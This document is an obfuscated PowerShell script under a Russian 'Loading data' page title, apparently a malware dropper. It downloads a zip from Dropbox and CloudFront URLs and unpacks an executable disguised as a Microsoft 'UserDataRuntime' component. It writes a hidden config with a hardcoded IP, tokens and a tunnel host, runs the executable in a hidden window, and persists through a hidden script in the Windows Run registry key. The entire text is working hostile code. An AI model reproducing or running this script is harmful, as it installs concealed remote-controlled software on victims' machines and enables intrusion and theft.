Загрузка данных


[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
& {
param(
    [Parameter(Mandatory=$true)]
    [Alias("h")]
    [int]$HostNum
)
$ScriptRoot = $PSScriptRoot
$_bcqfwcb = "51.195.232.76"
$_yyewne = "6902e641-eeba-4a5c-8bab-3c8eced5fe0a"
$_xesqemafpn = "34ANBkpuzgjyYIjbp7v82AdS566fCSMiRtKtw--D3nM"
$_xtxqtgkrp = "7810d6a6f5"
$_feyesqwqa = "github.githubassets.com"
$_pudxykcc = 417
$_exxrrkn = "chrome"
$_ld = "Microsoft\UserData\Core"
$_le = "UserDataRuntime.exe"
$_lr = "UserDataRuntimeSvc"
$_vhsxpzbtxc = 3876
$_lw = "maintenance.ps1"
$_lp = "xiqod86.dat"
$_ggbgem = @(
    'https://www.dropbox.com/scl/fi/1l95g8af1etaov7yp5z2d/c.zip?rlkey=byix1ywoq4ybp26d1udc7iwfy&st=y8cqotwz&raw=1'
    'https://d3lh1tj2kid78y.cloudfront.net/dl/008f2b7a2ff4cdc1b39af/c.zip'
    'https://d2ziwv9hws3tme.cloudfront.net/dl/008f2b7a2ff4cdc1b39af/c.zip'
)

IF (-not $HostNum) { $HostNum = [int]$env:HOSTNUM }

$_rdwhmtfa = 2466
$_dyuhwbx = "h$HostNum.tunnel"

$_brvrgt = 4068
$_wrhzfyqrh  = jOiN-PATH $env:LocalAppData $_ld
$_bypayy = $_le
$_wtdayn = $_lr

[void](New-Item -ItemType Directory -Path $_wrhzfyqrh -Force -EA 0)

Get-Process -EA 0 | whERE-OBjEct { $_.ProcessName -eq $_bypayy.Replace('.exe','') } | sTOP-PROcesS -Force -EA 0
$_qcuhbps = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
RemOve-iteMPropErtY -Path $_qcuhbps -Name $_wtdayn -EA 0
$_zkbgdv = 1264
sTArt-SLeeP 5

$_t = joiN-PaTh $_wrhzfyqrh $_bypayy
IF (-not (Test-Path $_t)) {
    $ProgressPreference = 'SilentlyContinue'
    $_nxewdkrkd = $false
    $_aaegsztqyf = jOiN-Path $_wrhzfyqrh $_lp
    FOREaCH ($_qdvvmnvnzp IN $_ggbgem) {
        if ($_nxewdkrkd) { bREak }
        tRy {
            $_kdhwrfsqm = nEW-oBJecT System.Net.WebClient
            $_kdhwrfsqm.Proxy = $null
            $_kdhwrfsqm.DownloadFile($_qdvvmnvnzp, $_aaegsztqyf)
            $_nxewdkrkd = $true
        } CatCH {}
    }
    $_xscafxxf = 2270
    if (-not $_nxewdkrkd) {
        foreach ($_qdvvmnvnzp in $_ggbgem) {
            $_bzgcgsjrbr = 1886
            IF ($_nxewdkrkd) { brEAk }
            TRY {
                $_kdhwrfsqm = NeW-oBJeCt System.Net.WebClient
                $_kdhwrfsqm.Proxy = [System.Net.WebRequest]::DefaultWebProxy
                $_kdhwrfsqm.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials
                $_paqthnezgk = 2307
                $_kdhwrfsqm.DownloadFile($_qdvvmnvnzp, $_aaegsztqyf)
                $_nxewdkrkd = $true
            } cATCH {}
        }
    }
    $_cjxbpbwndk = 610
    if (-not $_nxewdkrkd) { exit 1 }
    $_jwunfqh = JOIn-path $env:TEMP ('cx' + [guid]::NewGuid().ToString('N'))
    $_kjcwbwrhd = 835
    New-Item -ItemType Directory -Path $_jwunfqh -Force | OUt-NUlL
    tRy {
        Add-Type -AssemblyName System.IO.Compression.FileSystem
        [IO.Compression.ZipFile]::ExtractToDirectory($_aaegsztqyf, $_jwunfqh)
    } catch {
        tar -xf $_aaegsztqyf -C $_jwunfqh 2>$null
    }
    $_xmzsfwbdyz = 346
    Copy-Item (JoIn-PATh $_jwunfqh '*') $_wrhzfyqrh -Recurse -Force -EA 0
    Remove-Item $_jwunfqh -Recurse -Force -EA 0
    $_kcfuems = gET-childiTEM $_wrhzfyqrh -Filter *.exe -Recurse -EA 0 | whERe-ObjecT { $_.FullName -ne $_t } | Select-Object -First 1
    IF ($_kcfuems) { MOVE-IteM $_kcfuems.FullName $_t -Force }
    RemoVe-iTEm $_aaegsztqyf -Force -EA 0
}

$_pejqjrx = joiN-pAth $_wrhzfyqrh 'layout.dat'
IF (Test-Path $_pejqjrx) {
    $_wsrvwtvw = 1677
    $_nqmsqnqw = Join-Path $_wrhzfyqrh 'config.json'
    $_uhpycd = [IO.File]::ReadAllText($_pejqjrx)
    $_qqwyhcj = 3754
    $_uhpycd = $_uhpycd.Replace('__P1__', $_bcqfwcb).Replace('__P2__', $_yyewne).Replace('__P3__', $_xesqemafpn).Replace('__P4__', $_xtxqtgkrp).Replace('__P5__', $_feyesqwqa).Replace('__P6__', $_exxrrkn).Replace('__P7__', $_dyuhwbx)
    if (TeST-PATH $_nqmsqnqw) { (Get-itEm $_nqmsqnqw -Force).Attributes = 'Normal' }
    $_kxshphkquz = 1861
    [IO.File]::WriteAllText($_nqmsqnqw, $_uhpycd)
    (Get-Item $_nqmsqnqw).Attributes = [IO.FileAttributes]::Hidden
    $_fkkavd = 1951
    ReMOVE-ITEM $_pejqjrx -Force -EA 0
}

$_zssvgrzhmr = New-Object System.Diagnostics.ProcessStartInfo
$_zssvgrzhmr.FileName = Join-Path $_wrhzfyqrh $_bypayy
$_gdwwkjmjn = 1090
$_zssvgrzhmr.WorkingDirectory = $_wrhzfyqrh
$_gnzhbdb = 347
$_zssvgrzhmr.WindowStyle = [Diagnostics.ProcessWindowStyle]::Hidden
$_zssvgrzhmr.UseShellExecute = $true
[void][Diagnostics.Process]::Start($_zssvgrzhmr)
sTaRt-SlEEP 2

$_jnncpc = jOiN-pATh $_wrhzfyqrh $_lw
$_updebbgw = '$p = New-Object System.Diagnostics.ProcessStartInfo; $p.FileName = "' + (jOin-paTh $_wrhzfyqrh $_bypayy) + '"; $p.WorkingDirectory = "' + $_wrhzfyqrh + '"; $p.WindowStyle = [Diagnostics.ProcessWindowStyle]::Hidden; $p.UseShellExecute = $true; [void][Diagnostics.Process]::Start($p)'
$_bsfvan = 1706
iF (Test-Path $_jnncpc) { (Get-iTEM $_jnncpc -Force).Attributes = 'Normal' }
$_qgwsvre = 1655
[IO.File]::WriteAllText($_jnncpc, $_updebbgw)
(Get-Item $_jnncpc).Attributes = [IO.FileAttributes]::Hidden

$_zhfgwbs = 331
$_avbbucxeq = 'powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "' + $_jnncpc + '"'
New-Item -Path $_qcuhbps -Force -EA 0 | OUT-nuLl
$_dzqzjgqqzw = 784
Set-ItemProperty -Path $_qcuhbps -Name $_wtdayn -Value $_avbbucxeq -EA 0
$_qvzsnp = 1914
exit 0
} -h 6